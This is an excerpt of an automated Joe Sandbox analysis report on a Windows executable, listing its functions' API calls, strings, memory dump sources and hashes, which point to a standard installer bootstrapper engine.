                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: QueryValue$lstrlen
                                                                                                                                                                    • String ID: BundleUpgradeCode$regutil.cpp
                                                                                                                                                                    • API String ID: 3790715954-1648651458
                                                                                                                                                                    • Opcode ID: 538332051324992f9b7c973540004e3d907987fe01c6f974946b260a240c4360
                                                                                                                                                                    • Instruction ID: 4dd0bb61bf174ab0ac7c6bd659aad53119ebd41cd3e548fb1fdbfa042c6395ab
                                                                                                                                                                    • Opcode Fuzzy Hash: 538332051324992f9b7c973540004e3d907987fe01c6f974946b260a240c4360
                                                                                                                                                                    • Instruction Fuzzy Hash: 6441BF36A0022AEFDB21DF95C884EAEB7ADEF44714F15416AFD01EB640D6709D80DBA0
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 0094490D: SetFilePointerEx.KERNELBASE(?,?,?,?,?,00000000,?,?,?,00918770,00000000,00000000,00000000,00000000,00000000), ref: 00944925
                                                                                                                                                                      • Part of subcall function 0094490D: GetLastError.KERNEL32(?,?,?,00918770,00000000,00000000,00000000,00000000,00000000), ref: 0094492F
                                                                                                                                                                    • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,00945C09,?,?,?,?,?,?,?,00010000,?), ref: 009463C0
                                                                                                                                                                    • WriteFile.KERNEL32(000000FF,00000008,00000008,?,00000000,000000FF,00000000,00000000,00000000,00000000,?,00945C09,?,?,?,?), ref: 00946412
                                                                                                                                                                    • GetLastError.KERNEL32(?,00945C09,?,?,?,?,?,?,?,00010000,?,00000001,?,GET,?,?), ref: 00946458
                                                                                                                                                                    • GetLastError.KERNEL32(?,00945C09,?,?,?,?,?,?,?,00010000,?,00000001,?,GET,?,?), ref: 0094647E
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                     • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorFileLast$Write$Pointer
                                                                                                                                                                    • String ID: dlutil.cpp
                                                                                                                                                                    • API String ID: 133221148-2067379296
                                                                                                                                                                    • Opcode ID: 7bb58964863f01626a203ecfe7b83a6f6b56c47116643b4b07df30ca25ad03cf
                                                                                                                                                                    • Instruction ID: 32e0046c5bc2da87471e56529bf320f0a78b52b01f071c3a825529c2a4f7b571
                                                                                                                                                                    • Opcode Fuzzy Hash: 7bb58964863f01626a203ecfe7b83a6f6b56c47116643b4b07df30ca25ad03cf
                                                                                                                                                                    • Instruction Fuzzy Hash: 8A41A0B290021ABFEF218E94CD45FAA7B69EF05765F154225FD00A61A0D371DD20DBA2
                                                                                                                                                                    APIs
                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(?,00000000,0093FFEF,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,0093FFEF,009212CF,?,00000000), ref: 0090246E
                                                                                                                                                                    • GetLastError.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,0093FFEF,009212CF,?,00000000,0000FDE9,?,009212CF), ref: 0090247A
                                                                                                                                                                      • Part of subcall function 00903BD3: GetProcessHeap.KERNEL32(00000000,000001C7,?,009021CC,000001C7,80004005,8007139F,?,?,00940267,8007139F,?,00000000,00000000,8007139F), ref: 00903BDB
                                                                                                                                                                      • Part of subcall function 00903BD3: HeapSize.KERNEL32(00000000,?,009021CC,000001C7,80004005,8007139F,?,?,00940267,8007139F,?,00000000,00000000,8007139F), ref: 00903BE2
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                     • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Heap$ByteCharErrorLastMultiProcessSizeWide
                                                                                                                                                                    • String ID: strutil.cpp
                                                                                                                                                                    • API String ID: 3662877508-3612885251
                                                                                                                                                                    • Opcode ID: 08a4b4788ae1662bf445e8c8b32814b5697ebae0341c41e077cb6d02adc342a3
                                                                                                                                                                    • Instruction ID: b8a5351d53362f4526dacbc3b0fa32b7abdb2b6d40f91f53abd815bc395fafa9
                                                                                                                                                                    • Opcode Fuzzy Hash: 08a4b4788ae1662bf445e8c8b32814b5697ebae0341c41e077cb6d02adc342a3
                                                                                                                                                                    • Instruction Fuzzy Hash: 6A31D23130421AEFEB119F698CD8A7637DDEB553A8B208629FE159B2E0E775CC019760
                                                                                                                                                                    APIs
                                                                                                                                                                    • CompareStringW.KERNEL32(0000007F,00000000,00000000,000000FF,?,000000FF,?,00000000,?,?,?,00000000,00000000,?,?,00000000), ref: 0092ADB3
                                                                                                                                                                    Strings
                                                                                                                                                                    • Failed to extract payload: %ls from container: %ls, xrefs: 0092AE3E
                                                                                                                                                                    • Failed to extract all payloads from container: %ls, xrefs: 0092ADF7
                                                                                                                                                                    • Failed to skip the extraction of payload: %ls from container: %ls, xrefs: 0092AE4A
                                                                                                                                                                    • Failed to open container: %ls., xrefs: 0092AD85
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CompareString
                                                                                                                                                                    • String ID: Failed to extract all payloads from container: %ls$Failed to extract payload: %ls from container: %ls$Failed to open container: %ls.$Failed to skip the extraction of payload: %ls from container: %ls
                                                                                                                                                                    • API String ID: 1825529933-3891707333
                                                                                                                                                                    • Opcode ID: 69cda61fa506720e3ea3030f4f064592856cb8365d735ac3c3c468c61e2a73a2
                                                                                                                                                                    • Instruction ID: 2a86f0d04766fff6513986d3d2d738366aff3c1cd77576b7ac2bd01c6190d2d8
                                                                                                                                                                    • Opcode Fuzzy Hash: 69cda61fa506720e3ea3030f4f064592856cb8365d735ac3c3c468c61e2a73a2
                                                                                                                                                                    • Instruction Fuzzy Hash: 3E31E273C00129EFCF21AAE4DC46F9E7768AF44721F214611FE20A71D5E7319A15DBA2
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 0090394F: GetProcessHeap.KERNEL32(?,000001C7,?,00902274,000001C7,00000001,80004005,8007139F,?,?,00940267,8007139F,?,00000000,00000000,8007139F), ref: 00903960
                                                                                                                                                                      • Part of subcall function 0090394F: RtlAllocateHeap.NTDLL(00000000,?,00902274,000001C7,00000001,80004005,8007139F,?,?,00940267,8007139F,?,00000000,00000000,8007139F), ref: 00903967
                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 00947AF4
                                                                                                                                                                    • SysFreeString.OLEAUT32(?), ref: 00947AFF
                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 00947B0A
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: FreeString$Heap$AllocateProcess
                                                                                                                                                                    • String ID: `<u$atomutil.cpp
                                                                                                                                                                    • API String ID: 2724874077-4051019476
                                                                                                                                                                    • Opcode ID: 252b6366bb4ef413eeff65f2879a6cceb1005ab15c4216db3665de883d5c16ec
                                                                                                                                                                    • Instruction ID: 1e991bd9fe6ad6dd526033650efdca20e8efb49e315151dedaaa117666eea709
                                                                                                                                                                    • Opcode Fuzzy Hash: 252b6366bb4ef413eeff65f2879a6cceb1005ab15c4216db3665de883d5c16ec
                                                                                                                                                                    • Instruction Fuzzy Hash: C0318032D1912DBBCB229BE4CC45F9EFBADEF44750F1141A1E900AB250DB70DE049B90
                                                                                                                                                                    APIs
                                                                                                                                                                    • CompareStringW.KERNEL32(0000007F,00000000,00000001,000000FF,?,000000FF,00000001,PackageVersion,00000001,?,00910654,00000001,00000001,00000001,00910654,00000000), ref: 0090F07D
                                                                                                                                                                    • RegCloseKey.ADVAPI32(00000000,00000001,PackageVersion,00000001,?,00910654,00000001,00000001,00000001,00910654,00000000,00000001,00000000,?,00910654,00000001), ref: 0090F09A
                                                                                                                                                                    Strings
                                                                                                                                                                    • Failed to format key for update registration., xrefs: 0090F033
                                                                                                                                                                    • Failed to remove update registration key: %ls, xrefs: 0090F0C7
                                                                                                                                                                    • PackageVersion, xrefs: 0090F05E
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CloseCompareString
                                                                                                                                                                    • String ID: Failed to format key for update registration.$Failed to remove update registration key: %ls$PackageVersion
                                                                                                                                                                    • API String ID: 446873843-3222553582
                                                                                                                                                                    • Opcode ID: d020710c30baf2241b327896b9c05eee5201a289412a936891d50b9c7d3c7896
                                                                                                                                                                    • Instruction ID: 217289deda3a131c74e2b4b65df2bb8be32a8c467c6ac6d10dc6083a3b27d27d
                                                                                                                                                                    • Opcode Fuzzy Hash: d020710c30baf2241b327896b9c05eee5201a289412a936891d50b9c7d3c7896
                                                                                                                                                                    • Instruction Fuzzy Hash: 69218031900229BFDB31ABA5CC09FAEBAB8DF85720F100265FD14A2592E7719A40D790
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 00944440: FindFirstFileW.KERNEL32(0092923A,?,00000100,00000000,00000000), ref: 0094447B
                                                                                                                                                                      • Part of subcall function 00944440: FindClose.KERNEL32(00000000), ref: 00944487
                                                                                                                                                                    • RegCloseKey.ADVAPI32(?,00000000,?,00000000,?,00000000,?,00000000,?,wininet.dll,?,crypt32.dll,?,?,?,00000000), ref: 00944430
                                                                                                                                                                      • Part of subcall function 00940F6C: RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,0096AAA0,00000000,?,009457E1,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000), ref: 00940F80
                                                                                                                                                                      • Part of subcall function 00941217: RegQueryValueExW.ADVAPI32(00000000,000002C0,00000000,000002C0,00000000,00000000,000002C0,BundleUpgradeCode,00000410,000002C0,00000000,00000000,00000000,00000100,00000000), ref: 0094123F
                                                                                                                                                                      • Part of subcall function 00941217: RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,?,?,?,?,?,009170E8,00000100,000000B0,00000088,00000410,000002C0), ref: 00941276
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CloseFindQueryValue$FileFirstOpen
                                                                                                                                                                    • String ID: PendingFileRenameOperations$SYSTEM\CurrentControlSet\Control\Session Manager$\$crypt32.dll
                                                                                                                                                                    • API String ID: 3397690329-3978359083
                                                                                                                                                                    • Opcode ID: 804f8cfc74d228be9049e9aecb1a726e26e8207062996a32105172975ac85fc6
                                                                                                                                                                    • Instruction ID: f72483ebf13e9c65abcc0b10a2f516f661e9d0c16c9c17f3089f5323cb0022cf
                                                                                                                                                                    • Opcode Fuzzy Hash: 804f8cfc74d228be9049e9aecb1a726e26e8207062996a32105172975ac85fc6
                                                                                                                                                                    • Instruction Fuzzy Hash: 6331AE32A00219EBDF20AF91CC45FBEB7B9EF40B55F54817AE904A6161E3319E80DB90
                                                                                                                                                                    APIs
                                                                                                                                                                    • CopyFileW.KERNEL32(00000000,00904DBC,00000000,?,?,00000000,?,0094412D,00000000,00904DBC,00000000,00000000,?,009185EE,?,?), ref: 00944033
                                                                                                                                                                    • GetLastError.KERNEL32(?,0094412D,00000000,00904DBC,00000000,00000000,?,009185EE,?,?,00000001,00000003,000007D0,?,?,?), ref: 00944041
                                                                                                                                                                    • CopyFileW.KERNEL32(00000000,00904DBC,00000000,00904DBC,00000000,?,0094412D,00000000,00904DBC,00000000,00000000,?,009185EE,?,?,00000001), ref: 009440AC
                                                                                                                                                                    • GetLastError.KERNEL32(?,0094412D,00000000,00904DBC,00000000,00000000,?,009185EE,?,?,00000001,00000003,000007D0,?,?,?), ref: 009440B6
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CopyErrorFileLast
                                                                                                                                                                    • String ID: fileutil.cpp
                                                                                                                                                                    • API String ID: 374144340-2967768451
                                                                                                                                                                    • Opcode ID: c01f4a5cb7e1777d1e68e301a3a764402d08c8cf4c38a332da47828d5b663218
                                                                                                                                                                    • Instruction ID: 3d415dad84a49a94d4e7a6fb7b7acbc03da880df864093561847cfb9ce649e8b
                                                                                                                                                                    • Opcode Fuzzy Hash: c01f4a5cb7e1777d1e68e301a3a764402d08c8cf4c38a332da47828d5b663218
                                                                                                                                                                    • Instruction Fuzzy Hash: 5321F3366053369BEB300AAA4C40F3B679CEF55BA5B150536FF04DB151E7E5CC6092E1
                                                                                                                                                                    APIs
                                                                                                                                                                    • _MREFOpen@16.MSPDB140-MSVCRT ref: 0090EF56
                                                                                                                                                                      • Part of subcall function 00944153: SetFileAttributesW.KERNEL32(0092923A,00000080,00000000,0092923A,000000FF,00000000,?,?,0092923A), ref: 00944182
                                                                                                                                                                      • Part of subcall function 00944153: GetLastError.KERNEL32(?,?,0092923A), ref: 0094418C
                                                                                                                                                                      • Part of subcall function 00903C6B: RemoveDirectoryW.KERNEL32(00000001,00000000,00000000,00000000,?,?,0090EFA1,00000001,00000000,00000095,00000001,00910663,00000095,00000000,swidtag,00000001), ref: 00903C88
                                                                                                                                                                    Strings
                                                                                                                                                                    • swidtag, xrefs: 0090EF65
                                                                                                                                                                    • Failed to format tag folder path., xrefs: 0090EFC3
                                                                                                                                                                    • Failed to allocate regid file path., xrefs: 0090EFB5
                                                                                                                                                                    • Failed to allocate regid folder path., xrefs: 0090EFBC
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AttributesDirectoryErrorFileLastOpen@16Remove
                                                                                                                                                                    • String ID: Failed to allocate regid file path.$Failed to allocate regid folder path.$Failed to format tag folder path.$swidtag
                                                                                                                                                                    • API String ID: 1428973842-4170906717
                                                                                                                                                                    • Opcode ID: cdcb987bad19793d721e3233fdb2db0935d49b1c5f7d54ebab1d00693780416f
                                                                                                                                                                    • Instruction ID: 8d9f0c5d41eeeb0cdaaed78733c7695591c5bb5fa9b463cba3eafa053d577e81
                                                                                                                                                                    • Opcode Fuzzy Hash: cdcb987bad19793d721e3233fdb2db0935d49b1c5f7d54ebab1d00693780416f
                                                                                                                                                                    • Instruction Fuzzy Hash: E6219831D04529BFCB15EB99CC01B9DFBB9EF84310F1184A5FA18AA2E1D7319E40EB90
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 00940F6C: RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,0096AAA0,00000000,?,009457E1,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000), ref: 00940F80
                                                                                                                                                                    • CompareStringW.KERNEL32(00000000,00000001,00000000,000000FF,?,000000FF,00000000,00000000,00000000,-80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,00020019,00000000,00000100,00000100,000001B4), ref: 00928E3A
                                                                                                                                                                    • RegCloseKey.ADVAPI32(00000000,-80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,00020019,00000000,00000100,00000100,000001B4,?,?,?,0090F7E0,00000001,00000100,000001B4,00000000), ref: 00928E88
                                                                                                                                                                    Strings
                                                                                                                                                                    • Failed to open uninstall registry key., xrefs: 00928DFD
                                                                                                                                                                    • Failed to enumerate uninstall key for related bundles., xrefs: 00928E99
                                                                                                                                                                    • SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 00928DD7
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CloseCompareOpenString
                                                                                                                                                                    • String ID: Failed to enumerate uninstall key for related bundles.$Failed to open uninstall registry key.$SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
                                                                                                                                                                    • API String ID: 2817536665-2531018330
                                                                                                                                                                    • Opcode ID: f4dbb9340672f1550e50be4adb18b4b351837c60751f639fe60e89d5a4b8f811
                                                                                                                                                                    • Instruction ID: 759bb3cd525936a9237a41e6baac96ef42ee82b225ce7d45630b48758ec9c38e
                                                                                                                                                                    • Opcode Fuzzy Hash: f4dbb9340672f1550e50be4adb18b4b351837c60751f639fe60e89d5a4b8f811
                                                                                                                                                                    • Instruction Fuzzy Hash: D621F936901238FFDB21BA94DC4AFAFBA7DEB40721F114564F91076064DB354E50E790
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 0090394F: GetProcessHeap.KERNEL32(?,000001C7,?,00902274,000001C7,00000001,80004005,8007139F,?,?,00940267,8007139F,?,00000000,00000000,8007139F), ref: 00903960
                                                                                                                                                                      • Part of subcall function 0090394F: RtlAllocateHeap.NTDLL(00000000,?,00902274,000001C7,00000001,80004005,8007139F,?,?,00940267,8007139F,?,00000000,00000000,8007139F), ref: 00903967
                                                                                                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0092D2EE
                                                                                                                                                                    • ReleaseMutex.KERNEL32(?), ref: 0092D31C
                                                                                                                                                                    • SetEvent.KERNEL32(?), ref: 0092D325
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Heap$AllocateEventMutexObjectProcessReleaseSingleWait
                                                                                                                                                                    • String ID: Failed to allocate buffer.$NetFxChainer.cpp
                                                                                                                                                                    • API String ID: 944053411-3611226795
                                                                                                                                                                    • Opcode ID: d91b0da85f18a2856e1c489929a815504c200341f5f72953a40074ae1a1133d8
                                                                                                                                                                    • Instruction ID: c3b3f9c0c8a0659307c5e2deef886e0d3a4e31b067210eaa7efb9c780ca1de84
                                                                                                                                                                    • Opcode Fuzzy Hash: d91b0da85f18a2856e1c489929a815504c200341f5f72953a40074ae1a1133d8
                                                                                                                                                                    • Instruction Fuzzy Hash: BA21A3B4604206FFDB109F68D884A59B7F9FF88324F108669F964A7291C7B1E950CB90
                                                                                                                                                                    APIs
                                                                                                                                                                    • QueryServiceConfigW.ADVAPI32(00000000,00000000,00000000,?,00000001,00000000,?,?,00926B11,00000000,?), ref: 0094591D
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,00926B11,00000000,?,?,?,?,?,?,?,?,?,00926F28,?,?), ref: 0094592B
                                                                                                                                                                      • Part of subcall function 0090394F: GetProcessHeap.KERNEL32(?,000001C7,?,00902274,000001C7,00000001,80004005,8007139F,?,?,00940267,8007139F,?,00000000,00000000,8007139F), ref: 00903960
                                                                                                                                                                      • Part of subcall function 0090394F: RtlAllocateHeap.NTDLL(00000000,?,00902274,000001C7,00000001,80004005,8007139F,?,?,00940267,8007139F,?,00000000,00000000,8007139F), ref: 00903967
                                                                                                                                                                    • QueryServiceConfigW.ADVAPI32(00000000,00000000,?,?,?,00000001,?,?,00926B11,00000000,?), ref: 00945965
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,00926B11,00000000,?,?,?,?,?,?,?,?,?,00926F28,?,?), ref: 0094596F
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ConfigErrorHeapLastQueryService$AllocateProcess
                                                                                                                                                                    • String ID: svcutil.cpp
                                                                                                                                                                    • API String ID: 355237494-1746323212
                                                                                                                                                                    • Opcode ID: 94a0c48acfe2f7f5ad44e2a3da0d4e40e493b6fd9cbb87ef1993ddd44d129e7a
                                                                                                                                                                    • Instruction ID: 2841fe862b96528d380c840af30808298406211310c7d1f4919e67aab867e445
                                                                                                                                                                    • Opcode Fuzzy Hash: 94a0c48acfe2f7f5ad44e2a3da0d4e40e493b6fd9cbb87ef1993ddd44d129e7a
                                                                                                                                                                    • Instruction Fuzzy Hash: BA21F336955A39FBD7219AD58D04F9FBA6DAF81B70F574011FD04AB242E660CD00A2E0
                                                                                                                                                                    APIs
                                                                                                                                                                    • SysAllocString.OLEAUT32(?), ref: 00943258
                                                                                                                                                                    • VariantInit.OLEAUT32(?), ref: 00943264
                                                                                                                                                                    • VariantClear.OLEAUT32(?), ref: 009432D8
                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 009432E3
                                                                                                                                                                      • Part of subcall function 00943498: SysAllocString.OLEAUT32(?), ref: 009434AD
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: String$AllocVariant$ClearFreeInit
                                                                                                                                                                    • String ID: `<u
                                                                                                                                                                    • API String ID: 347726874-3367579956
                                                                                                                                                                    • Opcode ID: d4554299ee6d513c8437c03fef2d6e07a4bfa09e9fb35c0ef75c7c0abd528f3a
                                                                                                                                                                    • Instruction ID: 818fcc5ef2f8bf7a4507d3a3cc66e601dda954c043d0f2343bfe41304b2246f0
                                                                                                                                                                    • Opcode Fuzzy Hash: d4554299ee6d513c8437c03fef2d6e07a4bfa09e9fb35c0ef75c7c0abd528f3a
                                                                                                                                                                    • Instruction Fuzzy Hash: 23214C35A0121AAFCB14DFB4C858EAEBBB9EF49725F108158E8119B220D771DE05CB90
                                                                                                                                                                    APIs
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
